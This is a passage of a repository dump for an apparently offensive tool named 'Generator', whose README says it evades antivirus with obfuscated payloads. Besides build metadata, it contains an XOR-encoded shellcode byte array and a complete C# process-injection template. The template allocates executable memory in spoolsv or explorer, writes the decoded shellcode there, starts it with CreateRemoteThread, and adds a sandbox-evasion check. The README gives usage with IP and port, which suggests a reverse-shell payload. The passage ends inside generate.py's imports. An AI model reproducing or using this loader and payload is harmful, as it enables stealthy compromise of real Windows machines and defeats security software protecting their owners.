"build/.NETFramework/v4.5/PermissionSets/LocalIntranet.xml", 139 | "build/.NETFramework/v4.5/PresentationBuildTasks.dll", 140 | "build/.NETFramework/v4.5/PresentationBuildTasks.xml", 141 | "build/.NETFramework/v4.5/PresentationCore.dll", 142 | "build/.NETFramework/v4.5/PresentationCore.xml", 143 | "build/.NETFramework/v4.5/PresentationFramework.Aero.dll", 144 | "build/.NETFramework/v4.5/PresentationFramework.Aero.xml", 145 | "build/.NETFramework/v4.5/PresentationFramework.Aero2.dll", 146 | "build/.NETFramework/v4.5/PresentationFramework.AeroLite.dll", 147 | "build/.NETFramework/v4.5/PresentationFramework.Classic.dll", 148 | "build/.NETFramework/v4.5/PresentationFramework.Classic.xml", 149 | "build/.NETFramework/v4.5/PresentationFramework.Luna.dll", 150 | "build/.NETFramework/v4.5/PresentationFramework.Luna.xml", 151 | "build/.NETFramework/v4.5/PresentationFramework.Royale.dll", 152 | "build/.NETFramework/v4.5/PresentationFramework.Royale.xml", 153 | "build/.NETFramework/v4.5/PresentationFramework.dll", 154 | "build/.NETFramework/v4.5/PresentationFramework.xml", 155 | "build/.NETFramework/v4.5/ReachFramework.dll", 156 | "build/.NETFramework/v4.5/ReachFramework.xml", 157 | "build/.NETFramework/v4.5/RedistList/FrameworkList.xml", 158 | "build/.NETFramework/v4.5/System.Activities.Core.Presentation.dll", 159 | "build/.NETFramework/v4.5/System.Activities.Core.Presentation.xml", 160 | "build/.NETFramework/v4.5/System.Activities.DurableInstancing.dll", 161 | "build/.NETFramework/v4.5/System.Activities.DurableInstancing.xml", 162 | "build/.NETFramework/v4.5/System.Activities.Presentation.dll", 163 | "build/.NETFramework/v4.5/System.Activities.Presentation.xml", 164 | "build/.NETFramework/v4.5/System.Activities.dll", 165 | "build/.NETFramework/v4.5/System.Activities.xml", 166 | "build/.NETFramework/v4.5/System.AddIn.Contract.dll", 167 | "build/.NETFramework/v4.5/System.AddIn.Contract.xml", 168 | "build/.NETFramework/v4.5/System.AddIn.dll", 169 | "build/.NETFramework/v4.5/System.AddIn.xml", 170 | "build/.NETFramework/v4.5/System.ComponentModel.Composition.Registration.dll", 171 | "build/.NETFramework/v4.5/System.ComponentModel.Composition.dll", 172 | "build/.NETFramework/v4.5/System.ComponentModel.Composition.xml", 173 | "build/.NETFramework/v4.5/System.ComponentModel.DataAnnotations.dll", 174 | "build/.NETFramework/v4.5/System.ComponentModel.DataAnnotations.xml", 175 | "build/.NETFramework/v4.5/System.Configuration.Install.dll", 176 | "build/.NETFramework/v4.5/System.Configuration.Install.xml", 177 | "build/.NETFramework/v4.5/System.Configuration.dll", 178 | "build/.NETFramework/v4.5/System.Configuration.xml", 179 | "build/.NETFramework/v4.5/System.Core.dll", 180 | "build/.NETFramework/v4.5/System.Core.xml", 181 | "build/.NETFramework/v4.5/System.Data.DataSetExtensions.dll", 182 | "build/.NETFramework/v4.5/System.Data.DataSetExtensions.xml", 183 | "build/.NETFramework/v4.5/System.Data.Entity.Design.dll", 184 | "build/.NETFramework/v4.5/System.Data.Entity.Design.xml", 185 | "build/.NETFramework/v4.5/System.Data.Entity.dll", 186 | "build/.NETFramework/v4.5/System.Data.Entity.xml", 187 | "build/.NETFramework/v4.5/System.Data.Linq.dll", 188 | "build/.NETFramework/v4.5/System.Data.Linq.xml", 189 | "build/.NETFramework/v4.5/System.Data.OracleClient.dll", 190 | "build/.NETFramework/v4.5/System.Data.OracleClient.xml", 191 | "build/.NETFramework/v4.5/System.Data.Services.Client.dll", 192 | "build/.NETFramework/v4.5/System.Data.Services.Client.xml", 193 | "build/.NETFramework/v4.5/System.Data.Services.Design.dll", 194 | "build/.NETFramework/v4.5/System.Data.Services.Design.xml", 195 | "build/.NETFramework/v4.5/System.Data.Services.dll", 196 | "build/.NETFramework/v4.5/System.Data.Services.xml", 197 | "build/.NETFramework/v4.5/System.Data.SqlXml.dll", 198 | "build/.NETFramework/v4.5/System.Data.SqlXml.xml", 199 | "build/.NETFramework/v4.5/System.Data.dll", 200 | "build/.NETFramework/v4.5/System.Data.xml", 201 | "build/.NETFramework/v4.5/System.Deployment.dll", 202 | "build/.NETFramework/v4.5/System.Deployment.xml", 203 | "build/.NETFramework/v4.5/System.Design.dll", 204 | "build/.NETFramework/v4.5/System.Design.xml", 205 | "build/.NETFramework/v4.5/System.Device.dll", 206 | "build/.NETFramework/v4.5/System.Device.xml", 207 | "build/.NETFramework/v4.5/System.DirectoryServices.AccountManagement.dll", 208 | "build/.NETFramework/v4.5/System.DirectoryServices.AccountManagement.xml", 209 | "build/.NETFramework/v4.5/System.DirectoryServices.Protocols.dll", 210 | "build/.NETFramework/v4.5/System.DirectoryServices.Protocols.xml", 211 | "build/.NETFramework/v4.5/System.DirectoryServices.dll", 212 | "build/.NETFramework/v4.5/System.DirectoryServices.xml", 213 | "build/.NETFramework/v4.5/System.Drawing.Design.dll", 214 | "build/.NETFramework/v4.5/System.Drawing.Design.xml", 215 | "build/.NETFramework/v4.5/System.Drawing.dll", 216 | "build/.NETFramework/v4.5/System.Drawing.xml", 217 | "build/.NETFramework/v4.5/System.EnterpriseServices.Thunk.dll", 218 | "build/.NETFramework/v4.5/System.EnterpriseServices.Wrapper.dll", 219 | "build/.NETFramework/v4.5/System.EnterpriseServices.dll", 220 | "build/.NETFramework/v4.5/System.EnterpriseServices.xml", 221 | "build/.NETFramework/v4.5/System.IO.Compression.FileSystem.dll", 222 | "build/.NETFramework/v4.5/System.IO.Compression.FileSystem.xml", 223 | "build/.NETFramework/v4.5/System.IO.Compression.dll", 224 | "build/.NETFramework/v4.5/System.IO.Compression.xml", 225 | "build/.NETFramework/v4.5/System.IO.Log.dll", 226 | "build/.NETFramework/v4.5/System.IO.Log.xml", 227 | "build/.NETFramework/v4.5/System.IdentityModel.Selectors.dll", 228 | "build/.NETFramework/v4.5/System.IdentityModel.Selectors.xml", 229 | "build/.NETFramework/v4.5/System.IdentityModel.Services.dll", 230 | "build/.NETFramework/v4.5/System.IdentityModel.Services.xml", 231 | "build/.NETFramework/v4.5/System.IdentityModel.dll", 232 | "build/.NETFramework/v4.5/System.IdentityModel.xml", 233 | "build/.NETFramework/v4.5/System.Management.Instrumentation.dll", 234 | "build/.NETFramework/v4.5/System.Management.Instrumentation.xml", 235 | "build/.NETFramework/v4.5/System.Management.dll", 236 | "build/.NETFramework/v4.5/System.Management.xml", 237 | "build/.NETFramework/v4.5/System.Messaging.dll", 238 | "build/.NETFramework/v4.5/System.Messaging.xml", 239 | "build/.NETFramework/v4.5/System.Net.Http.WebRequest.dll", 240 | "build/.NETFramework/v4.5/System.Net.Http.WebRequest.xml", 241 | "build/.NETFramework/v4.5/System.Net.Http.dll", 242 | "build/.NETFramework/v4.5/System.Net.Http.xml", 243 | "build/.NETFramework/v4.5/System.Net.dll", 244 | "build/.NETFramework/v4.5/System.Net.xml", 245 | "build/.NETFramework/v4.5/System.Numerics.dll", 246 | "build/.NETFramework/v4.5/System.Numerics.xml", 247 | "build/.NETFramework/v4.5/System.Printing.dll", 248 | "build/.NETFramework/v4.5/System.Printing.xml", 249 | "build/.NETFramework/v4.5/System.Reflection.Context.dll", 250 | "build/.NETFramework/v4.5/System.Reflection.Context.xml", 251 | "build/.NETFramework/v4.5/System.Runtime.Caching.dll", 252 | "build/.NETFramework/v4.5/System.Runtime.Caching.xml", 253 | "build/.NETFramework/v4.5/System.Runtime.DurableInstancing.dll", 254 | "build/.NETFramework/v4.5/System.Runtime.DurableInstancing.xml", 255 | "build/.NETFramework/v4.5/System.Runtime.Remoting.dll", 256 | "build/.NETFramework/v4.5/System.Runtime.Remoting.xml", 257 | "build/.NETFramework/v4.5/System.Runtime.Serialization.Formatters.Soap.dll", 258 | "build/.NETFramework/v4.5/System.Runtime.Serialization.Formatters.Soap.xml", 259 | "build/.NETFramework/v4.5/System.Runtime.Serialization.dll", 260 | "build/.NETFramework/v4.5/System.Runtime.Serialization.xml", 261 | "build/.NETFramework/v4.5/System.Security.dll", 262 | "build/.NETFramework/v4.5/System.Security.xml", 263 | "build/.NETFramework/v4.5/System.ServiceModel.Activation.dll", 264 | "build/.NETFramework/v4.5/System.ServiceModel.Activation.xml", 265 | "build/.NETFramework/v4.5/System.ServiceModel.Activities.dll", 266 | "build/.NETFramework/v4.5/System.ServiceModel.Activities.xml", 267 | "build/.NETFramework/v4.5/System.ServiceModel.Channels.dll", 268 | "build/.NETFramework/v4.5/System.ServiceModel.Channels.xml", 269 | "build/.NETFramework/v4.5/System.ServiceModel.Discovery.dll", 270 | "build/.NETFramework/v4.5/System.ServiceModel.Discovery.xml", 271 | "build/.NETFramework/v4.5/System.ServiceModel.Routing.dll", 272 | "build/.NETFramework/v4.5/System.ServiceModel.Routing.xml", 273 | "build/.NETFramework/v4.5/System.ServiceModel.Web.dll", 274 | "build/.NETFramework/v4.5/System.ServiceModel.Web.xml", 275 | "build/.NETFramework/v4.5/System.ServiceModel.dll", 276 | "build/.NETFramework/v4.5/System.ServiceModel.xml", 277 | "build/.NETFramework/v4.5/System.ServiceProcess.dll", 278 | "build/.NETFramework/v4.5/System.ServiceProcess.xml", 279 | "build/.NETFramework/v4.5/System.Speech.dll", 280 | "build/.NETFramework/v4.5/System.Speech.xml", 281 | "build/.NETFramework/v4.5/System.Threading.Tasks.Dataflow.xml", 282 | "build/.NETFramework/v4.5/System.Transactions.dll", 283 | "build/.NETFramework/v4.5/System.Transactions.xml", 284 | "build/.NETFramework/v4.5/System.Web.Abstractions.dll", 285 | "build/.NETFramework/v4.5/System.Web.ApplicationServices.dll", 286 | "build/.NETFramework/v4.5/System.Web.ApplicationServices.xml", 287 | "build/.NETFramework/v4.5/System.Web.DataVisualization.Design.dll", 288 | "build/.NETFramework/v4.5/System.Web.DataVisualization.dll", 289 | "build/.NETFramework/v4.5/System.Web.DataVisualization.xml", 290 | "build/.NETFramework/v4.5/System.Web.DynamicData.Design.dll", 291 | "build/.NETFramework/v4.5/System.Web.DynamicData.Design.xml", 292 | "build/.NETFramework/v4.5/System.Web.DynamicData.dll", 293 | "build/.NETFramework/v4.5/System.Web.DynamicData.xml", 294 | "build/.NETFramework/v4.5/System.Web.Entity.Design.dll", 295 | "build/.NETFramework/v4.5/System.Web.Entity.Design.xml", 296 | "build/.NETFramework/v4.5/System.Web.Entity.dll", 297 | "build/.NETFramework/v4.5/System.Web.Entity.xml", 298 | "build/.NETFramework/v4.5/System.Web.Extensions.Design.dll", 299 | "build/.NETFramework/v4.5/System.Web.Extensions.Design.xml", 300 | "build/.NETFramework/v4.5/System.Web.Extensions.dll", 301 | "build/.NETFramework/v4.5/System.Web.Extensions.xml", 302 | "build/.NETFramework/v4.5/System.Web.Mobile.dll", 303 | "build/.NETFramework/v4.5/System.Web.Mobile.xml", 304 | "build/.NETFramework/v4.5/System.Web.RegularExpressions.dll", 305 | "build/.NETFramework/v4.5/System.Web.RegularExpressions.xml", 306 | "build/.NETFramework/v4.5/System.Web.Routing.dll", 307 | "build/.NETFramework/v4.5/System.Web.Services.dll", 308 | "build/.NETFramework/v4.5/System.Web.Services.xml", 309 | "build/.NETFramework/v4.5/System.Web.dll", 310 | "build/.NETFramework/v4.5/System.Web.xml", 311 | "build/.NETFramework/v4.5/System.Windows.Controls.Ribbon.dll", 312 | "build/.NETFramework/v4.5/System.Windows.Controls.Ribbon.xml", 313 | "build/.NETFramework/v4.5/System.Windows.Forms.DataVisualization.Design.dll", 314 | "build/.NETFramework/v4.5/System.Windows.Forms.DataVisualization.dll", 315 | "build/.NETFramework/v4.5/System.Windows.Forms.DataVisualization.xml", 316 | "build/.NETFramework/v4.5/System.Windows.Forms.dll", 317 | "build/.NETFramework/v4.5/System.Windows.Forms.xml", 318 | "build/.NETFramework/v4.5/System.Windows.Input.Manipulations.dll", 319 | "build/.NETFramework/v4.5/System.Windows.Input.Manipulations.xml", 320 | "build/.NETFramework/v4.5/System.Windows.Presentation.dll", 321 | "build/.NETFramework/v4.5/System.Windows.Presentation.xml", 322 | "build/.NETFramework/v4.5/System.Windows.dll", 323 | "build/.NETFramework/v4.5/System.Workflow.Activities.dll", 324 | "build/.NETFramework/v4.5/System.Workflow.Activities.xml", 325 | "build/.NETFramework/v4.5/System.Workflow.ComponentModel.dll", 326 | "build/.NETFramework/v4.5/System.Workflow.ComponentModel.xml", 327 | "build/.NETFramework/v4.5/System.Workflow.Runtime.dll", 328 | "build/.NETFramework/v4.5/System.Workflow.Runtime.xml", 329 | "build/.NETFramework/v4.5/System.WorkflowServices.dll", 330 | "build/.NETFramework/v4.5/System.WorkflowServices.xml", 331 | "build/.NETFramework/v4.5/System.Xaml.dll", 332 | "build/.NETFramework/v4.5/System.Xaml.xml", 333 | "build/.NETFramework/v4.5/System.Xml.Linq.dll", 334 | "build/.NETFramework/v4.5/System.Xml.Linq.xml", 335 | "build/.NETFramework/v4.5/System.Xml.Serialization.dll", 336 | "build/.NETFramework/v4.5/System.Xml.dll", 337 | "build/.NETFramework/v4.5/System.Xml.xml", 338 | "build/.NETFramework/v4.5/System.dll", 339 | "build/.NETFramework/v4.5/System.xml", 340 | "build/.NETFramework/v4.5/UIAutomationClient.dll", 341 | "build/.NETFramework/v4.5/UIAutomationClient.xml", 342 | "build/.NETFramework/v4.5/UIAutomationClientsideProviders.dll", 343 | "build/.NETFramework/v4.5/UIAutomationClientsideProviders.xml", 344 | "build/.NETFramework/v4.5/UIAutomationProvider.dll", 345 | "build/.NETFramework/v4.5/UIAutomationProvider.xml", 346 | "build/.NETFramework/v4.5/UIAutomationTypes.dll", 347 | "build/.NETFramework/v4.5/UIAutomationTypes.xml", 348 | "build/.NETFramework/v4.5/WindowsBase.dll", 349 | "build/.NETFramework/v4.5/WindowsBase.xml", 350 | "build/.NETFramework/v4.5/WindowsFormsIntegration.dll", 351 | "build/.NETFramework/v4.5/WindowsFormsIntegration.xml", 352 | "build/.NETFramework/v4.5/XamlBuildTask.dll", 353 | "build/.NETFramework/v4.5/XamlBuildTask.xml", 354 | "build/.NETFramework/v4.5/mscorlib.dll", 355 | "build/.NETFramework/v4.5/mscorlib.xml", 356 | "build/.NETFramework/v4.5/sysglobl.dll", 357 | "build/.NETFramework/v4.5/sysglobl.xml", 358 | "build/Microsoft.NETFramework.ReferenceAssemblies.net45.targets", 359 | "microsoft.netframework.referenceassemblies.net45.1.0.0.nupkg.sha512", 360 | "microsoft.netframework.referenceassemblies.net45.nuspec" 361 | ] 362 | } 363 | }, 364 | "projectFileDependencyGroups": { 365 | ".NETFramework,Version=v4.5": [ 366 | "Microsoft.NETFramework.ReferenceAssemblies >= 1.0.0" 367 | ] 368 | }, 369 | "packageFolders": { 370 | "/home/kali/.nuget/packages/": {} 371 | }, 372 | "project": { 373 | "version": "1.0.0", 374 | "restore": { 375 | "projectUniqueName": "/opt/Generator/Payload/Payload.csproj", 376 | "projectName": "Payload", 377 | "projectPath": "/opt/Generator/Payload/Payload.csproj", 378 | "packagesPath": "/home/kali/.nuget/packages/", 379 | "outputPath": "/opt/Generator/Payload/obj/", 380 | "projectStyle": "PackageReference", 381 | "configFilePaths": [ 382 | "/home/kali/.nuget/NuGet/NuGet.Config" 383 | ], 384 | "originalTargetFrameworks": [ 385 | "net45" 386 | ], 387 | "sources": { 388 | "https://api.nuget.org/v3/index.json": {} 389 | }, 390 | "frameworks": { 391 | "net45": { 392 | "targetAlias": "net45", 393 | "projectReferences": {} 394 | } 395 | }, 396 | "warningProperties": { 397 | "warnAsError": [ 398 | "NU1605" 399 | ] 400 | } 401 | }, 402 | "frameworks": { 403 | "net45": { 404 | "targetAlias": "net45", 405 | "dependencies": { 406 | "Microsoft.NETFramework.ReferenceAssemblies": { 407 | "suppressParent": "All", 408 | "target": "Package", 409 | "version": "[1.0.0, )", 410 | "autoReferenced": true 411 | } 412 | }, 413 | "runtimeIdentifierGraphPath": "/usr/share/dotnet/sdk/5.0.202/RuntimeIdentifierGraph.json" 414 | } 415 | }, 416 | "runtimes": { 417 | "win10-x64": { 418 | "#import": [] 419 | } 420 | } 421 | } 422 | } -------------------------------------------------------------------------------- /Payload/obj/project.nuget.cache: -------------------------------------------------------------------------------- 1 | { 2 | "version": 2, 3 | "dgSpecHash": "n/pqyBQw/1Km/kR2JvJYc5PJsdvf2aBCQEJfExGJiQdbHIsUe5wvUwsKWJRdjnDNHaDhrFQdcv2syo/MugsEEA==", 4 | "success": true, 5 | "projectFilePath": "/opt/Generator/Payload/Payload.csproj", 6 | "expectedPackageFiles": [ 7 | "/home/kali/.nuget/packages/microsoft.netframework.referenceassemblies/1.0.0/microsoft.netframework.referenceassemblies.1.0.0.nupkg.sha512", 8 | "/home/kali/.nuget/packages/microsoft.netframework.referenceassemblies.net45/1.0.0/microsoft.netframework.referenceassemblies.net45.1.0.0.nupkg.sha512" 9 | ], 10 | "logs": [] 11 | } -------------------------------------------------------------------------------- /Payload/obj/xor.csproj.nuget.dgspec.json: -------------------------------------------------------------------------------- 1 | { 2 | "format": 1, 3 | "restore": { 4 | "/opt/Generator/Payload/xor.csproj": {} 5 | }, 6 | "projects": { 7 | "/opt/Generator/Payload/xor.csproj": { 8 | "version": "1.0.0", 9 | "restore": { 10 | "projectUniqueName": "/opt/Generator/Payload/xor.csproj", 11 | "projectName": "xor", 12 | "projectPath": "/opt/Generator/Payload/xor.csproj", 13 | "packagesPath": "/home/kali/.nuget/packages/", 14 | "outputPath": "/opt/Generator/Payload/obj/", 15 | "projectStyle": "PackageReference", 16 | "configFilePaths": [ 17 | "/home/kali/.nuget/NuGet/NuGet.Config" 18 | ], 19 | "originalTargetFrameworks": [ 20 | "netcoreapp3.1" 21 | ], 22 | "sources": { 23 | "https://api.nuget.org/v3/index.json": {} 24 | }, 25 | "frameworks": { 26 | "netcoreapp3.1": { 27 | "targetAlias": "netcoreapp3.1", 28 | "projectReferences": {} 29 | } 30 | }, 31 | "warningProperties": { 32 | "warnAsError": [ 33 | "NU1605" 34 | ] 35 | } 36 | }, 37 | "frameworks": { 38 | "netcoreapp3.1": { 39 | "targetAlias": "netcoreapp3.1", 40 | "imports": [ 41 | "net461", 42 | "net462", 43 | "net47", 44 | "net471", 45 | "net472", 46 | "net48" 47 | ], 48 | "assetTargetFallback": true, 49 | "warn": true, 50 | "downloadDependencies": [ 51 | { 52 | "name": "Microsoft.AspNetCore.App.Runtime.win-x64", 53 | "version": "[3.1.14, 3.1.14]" 54 | }, 55 | { 56 | "name": "Microsoft.NETCore.App.Host.win-x64", 57 | "version": "[3.1.14, 3.1.14]" 58 | }, 59 | { 60 | "name": "Microsoft.NETCore.App.Runtime.win-x64", 61 | "version": "[3.1.14, 3.1.14]" 62 | } 63 | ], 64 | "frameworkReferences": { 65 | "Microsoft.NETCore.App": { 66 | "privateAssets": "all" 67 | } 68 | }, 69 | "runtimeIdentifierGraphPath": "/usr/share/dotnet/sdk/5.0.202/RuntimeIdentifierGraph.json" 70 | } 71 | }, 72 | "runtimes": { 73 | "win10-x64": { 74 | "#import": [] 75 | } 76 | } 77 | } 78 | } 79 | } -------------------------------------------------------------------------------- /Payload/obj/xor.csproj.nuget.g.props: -------------------------------------------------------------------------------- 1 |  2 | 3 | 4 | True 5 | NuGet 6 | $(MSBuildThisFileDirectory)project.assets.json 7 | /home/kali/.nuget/packages/ 8 | /home/kali/.nuget/packages/ 9 | PackageReference 10 | 5.9.1 11 | 12 | 13 | 14 | 15 | 16 | $(MSBuildAllProjects);$(MSBuildThisFileFullPath) 17 | 18 | -------------------------------------------------------------------------------- /Payload/obj/xor.csproj.nuget.g.targets: -------------------------------------------------------------------------------- 1 |  2 | 3 | 4 | $(MSBuildAllProjects);$(MSBuildThisFileFullPath) 5 | 6 | -------------------------------------------------------------------------------- /Payload/output.shellcode: -------------------------------------------------------------------------------- 1 | byte[] buf = new byte[511] { 2 | 0x12, 0xa6, 0x6d, 0x0a, 0x1e, 0x06, 0x22, 0xee, 0xee, 0xee, 0xaf, 0xbf, 0xaf, 0xbe, 0xbc, 3 | 0xbf, 0xa6, 0xdf, 0x3c, 0x8b, 0xa6, 0x65, 0xbc, 0x8e, 0xb8, 0xa6, 0x65, 0xbc, 0xf6, 0xa6, 4 | 0x65, 0xbc, 0xce, 0xa6, 0x65, 0x9c, 0xbe, 0xa3, 0xdf, 0x27, 0xa6, 0xe1, 0x59, 0xa4, 0xa4, 5 | 0xa6, 0xdf, 0x2e, 0x42, 0xd2, 0x8f, 0x92, 0xec, 0xc2, 0xce, 0xaf, 0x2f, 0x27, 0xe3, 0xaf, 6 | 0xef, 0x2f, 0x0c, 0x03, 0xbc, 0xa6, 0x65, 0xbc, 0xce, 0xaf, 0xbf, 0x65, 0xac, 0xd2, 0xa6, 7 | 0xef, 0x3e, 0x88, 0x6f, 0x96, 0xf6, 0xe5, 0xec, 0xe1, 0x6b, 0x9c, 0xee, 0xee, 0xee, 0x65, 8 | 0x6e, 0x66, 0xee, 0xee, 0xee, 0xa6, 0x6b, 0x2e, 0x9a, 0x89, 0xa6, 0xef, 0x3e, 0xbe, 0x65, 9 | 0xa6, 0xf6, 0xaa, 0x65, 0xae, 0xce, 0xa7, 0xef, 0x3e, 0x0d, 0xb8, 0xa6, 0x11, 0x27, 0xa3, 10 | 0xdf, 0x27, 0xaf, 0x65, 0xda, 0x66, 0xa6, 0xef, 0x38, 0xa6, 0xdf, 0x2e, 0xaf, 0x2f, 0x27, 11 | 0xe3, 0x42, 0xaf, 0xef, 0x2f, 0xd6, 0x0e, 0x9b, 0x1f, 0xa2, 0xed, 0xa2, 0xca, 0xe6, 0xab, 12 | 0xd7, 0x3f, 0x9b, 0x36, 0xb6, 0xaa, 0x65, 0xae, 0xca, 0xa7, 0xef, 0x3e, 0x88, 0xaf, 0x65, 13 | 0xe2, 0xa6, 0xaa, 0x65, 0xae, 0xf2, 0xa7, 0xef, 0x3e, 0xaf, 0x65, 0xea, 0x66, 0xa6, 0xef, 14 | 0x3e, 0xaf, 0xb6, 0xaf, 0xb6, 0xb0, 0xb7, 0xb4, 0xaf, 0xb6, 0xaf, 0xb7, 0xaf, 0xb4, 0xa6, 15 | 0x6d, 0x02, 0xce, 0xaf, 0xbc, 0x11, 0x0e, 0xb6, 0xaf, 0xb7, 0xb4, 0xa6, 0x65, 0xfc, 0x07, 16 | 0xa5, 0x11, 0x11, 0x11, 0xb3, 0xa7, 0x50, 0x99, 0x9d, 0xdc, 0xb1, 0xdd, 0xdc, 0xee, 0xee, 17 | 0xaf, 0xb8, 0xa7, 0x67, 0x08, 0xa6, 0x6f, 0x02, 0x4e, 0xef, 0xee, 0xee, 0xa7, 0x67, 0x0b, 18 | 0xa7, 0x52, 0xec, 0xee, 0xff, 0xbc, 0x2e, 0x46, 0xff, 0x6d, 0xaf, 0xba, 0xa7, 0x67, 0x0a, 19 | 0xa2, 0x67, 0x1f, 0xaf, 0x54, 0xa2, 0x99, 0xc8, 0xe9, 0x11, 0x3b, 0xa2, 0x67, 0x04, 0x86, 20 | 0xef, 0xef, 0xee, 0xee, 0xb7, 0xaf, 0x54, 0xc7, 0x6e, 0x85, 0xee, 0x11, 0x3b, 0x84, 0xe4, 21 | 0xaf, 0xb0, 0xbe, 0xbe, 0xa3, 0xdf, 0x27, 0xa3, 0xdf, 0x2e, 0xa6, 0x11, 0x2e, 0xa6, 0x67, 22 | 0x2c, 0xa6, 0x11, 0x2e, 0xa6, 0x67, 0x2f, 0xaf, 0x54, 0x04, 0xe1, 0x31, 0x0e, 0x11, 0x3b, 23 | 0xa6, 0x67, 0x29, 0x84, 0xfe, 0xaf, 0xb6, 0xa2, 0x67, 0x0c, 0xa6, 0x67, 0x17, 0xaf, 0x54, 24 | 0x77, 0x4b, 0x9a, 0x8f, 0x11, 0x3b, 0x6b, 0x2e, 0x9a, 0xe4, 0xa7, 0x11, 0x20, 0x9b, 0x0b, 25 | 0x06, 0x7d, 0xee, 0xee, 0xee, 0xa6, 0x6d, 0x02, 0xfe, 0xa6, 0x67, 0x0c, 0xa3, 0xdf, 0x27, 26 | 0x84, 0xea, 0xaf, 0xb6, 0xa6, 0x67, 0x17, 0xaf, 0x54, 0xec, 0x37, 0x26, 0xb1, 0x11, 0x3b, 27 | 0x6d, 0x16, 0xee, 0x90, 0xbb, 0xa6, 0x6d, 0x2a, 0xce, 0xb0, 0x67, 0x18, 0x84, 0xae, 0xaf, 28 | 0xb7, 0x86, 0xee, 0xfe, 0xee, 0xee, 0xaf, 0xb6, 0xa6, 0x67, 0x1c, 0xa6, 0xdf, 0x27, 0xaf, 29 | 0x54, 0xb6, 0x4a, 0xbd, 0x0b, 0x11, 0x3b, 0xa6, 0x67, 0x2d, 0xa7, 0x67, 0x29, 0xa3, 0xdf, 30 | 0x27, 0xa7, 0x67, 0x1e, 0xa6, 0x67, 0x34, 0xa6, 0x67, 0x17, 0xaf, 0x54, 0xec, 0x37, 0x26, 31 | 0xb1, 0x11, 0x3b, 0x6d, 0x16, 0xee, 0x93, 0xc6, 0xb6, 0xaf, 0xb9, 0xb7, 0x86, 0xee, 0xae, 32 | 0xee, 0xee, 0xaf, 0xb6, 0x84, 0xee, 0xb4, 0xaf, 0x54, 0xe5, 0xc1, 0xe1, 0xde, 0x11, 0x3b, 33 | 0xb9, 0xb7, 0xaf, 0x54, 0x9b, 0x80, 0xa3, 0x8f, 0x11, 0x3b, 0xa7, 0x11, 0x20, 0x07, 0xd2, 34 | 0x11, 0x11, 0x11, 0xa6, 0xef, 0x2d, 0xa6, 0xc7, 0x28, 0xa6, 0x6b, 0x18, 0x9b, 0x5a, 0xaf, 35 | 0x11, 0x09, 0xb6, 0x84, 0xee, 0xb7, 0x55, 0x0e, 0xf3, 0xc4, 0xe4, 0xaf, 0x67, 0x34, 0x11, 36 | 0x3b 37 | }; 38 | -------------------------------------------------------------------------------- /Payload/template: -------------------------------------------------------------------------------- 1 | using System; 2 | using System.Diagnostics; 3 | using System.Runtime.InteropServices; 4 | using System.Security.Principal; 5 | 6 | namespace RemoteShinject 7 | { 8 | public class Program 9 | { 10 | [Flags] 11 | public enum ProcessAccessFlags : uint 12 | { 13 | All = 0x001F0FFF 14 | } 15 | [Flags] 16 | public enum AllocationType 17 | { 18 | Commit = 0x1000, 19 | Reserve = 0x2000 20 | } 21 | 22 | [Flags] 23 | public enum MemoryProtection 24 | { 25 | ExecuteReadWrite = 0x40 26 | } 27 | 28 | [DllImport("kernel32.dll", SetLastError = true)] 29 | public static extern IntPtr OpenProcess(ProcessAccessFlags processAccess, bool bInheritHandle, int processId); 30 | 31 | [DllImport("kernel32.dll", SetLastError = true, ExactSpelling = true)] 32 | static extern IntPtr VirtualAllocEx(IntPtr hProcess, IntPtr lpAddress, uint dwSize, AllocationType flAllocationType, MemoryProtection flProtect); 33 | 34 | [DllImport("kernel32.dll", SetLastError = true)] 35 | public static extern bool WriteProcessMemory(IntPtr hProcess, IntPtr lpBaseAddress, byte[] lpBuffer, Int32 nSize, out IntPtr lpNumberOfBytesWritten); 36 | 37 | [DllImport("kernel32.dll")] 38 | static extern IntPtr CreateRemoteThread(IntPtr hProcess, IntPtr lpThreadAttributes, uint dwStackSize, IntPtr lpStartAddress, IntPtr lpParameter, uint dwCreationFlags, IntPtr lpThreadId); 39 | 40 | [System.Runtime.InteropServices.DllImport("kernel32.dll", SetLastError = true, ExactSpelling = true)] 41 | static extern IntPtr VirtualAllocExNuma(IntPtr hProcess, IntPtr lpAddress, uint dwSize, UInt32 flAllocationType, UInt32 flProtect, UInt32 nndPreferred); 42 | 43 | [System.Runtime.InteropServices.DllImport("kernel32.dll")] 44 | static extern IntPtr GetCurrentProcess(); 45 | 46 | static bool IsElevated 47 | { 48 | get 49 | { 50 | return WindowsIdentity.GetCurrent().Owner.IsWellKnown(WellKnownSidType.BuiltinAdministratorsSid); 51 | } 52 | } 53 | 54 | public static void Main(string[] args) 55 | { 56 | IntPtr mem = VirtualAllocExNuma(GetCurrentProcess(), IntPtr.Zero, 0x1000, 0x3000, 0x4, 0); 57 | if (mem == null) 58 | { 59 | return; 60 | } 61 | CHANGEME 62 | int len = buf.Length; 63 | String procName = ""; 64 | if (args.Length == 1) 65 | { 66 | procName = args[0]; 67 | } 68 | else if (args.Length == 0) { 69 | if (IsElevated) 70 | { 71 | procName = "spoolsv"; 72 | } 73 | else 74 | { 75 | procName = "explorer"; 76 | } 77 | } 78 | else 79 | { 80 | return; 81 | } 82 | Process[] expProc = Process.GetProcessesByName(procName); 83 | for (int i = 0; i < expProc.Length; i++) 84 | { 85 | int pid = expProc[i].Id; 86 | IntPtr hProcess = OpenProcess(ProcessAccessFlags.All, false, pid); 87 | if ((int)hProcess == 0) 88 | { 89 | continue; 90 | } 91 | IntPtr expAddr = VirtualAllocEx(hProcess, IntPtr.Zero, (uint)len, AllocationType.Commit | AllocationType.Reserve, MemoryProtection.ExecuteReadWrite); 92 | for (int j = 0; j < buf.Length; j++) 93 | { 94 | buf[j] = (byte)((uint)buf[j] ^ SPECIALKEY); 95 | } 96 | IntPtr bytesWritten; 97 | bool procMemResult = WriteProcessMemory(hProcess, expAddr, buf, len, out bytesWritten); 98 | IntPtr threadAddr = CreateRemoteThread(hProcess, IntPtr.Zero, 0, expAddr, IntPtr.Zero, 0, IntPtr.Zero); 99 | break; 100 | } 101 | } 102 | } 103 | } -------------------------------------------------------------------------------- /README.md: -------------------------------------------------------------------------------- 1 | # Generator 2 | Evade AV with obfuscated payloads 3 | 4 | 5 | # Installation 6 | 7 | must install `dotnet` prior to running the script with `net45` 8 | 9 | # Running 10 | 11 | `./generator.py -ip -port -key ` 12 | 13 | Should generate `payload.exe` 14 | -------------------------------------------------------------------------------- /generate.py: -------------------------------------------------------------------------------- 1 | #!/bin/env python3 2 | import sys 3 | import random 4 | import string 5 | import os 6 | import time 7 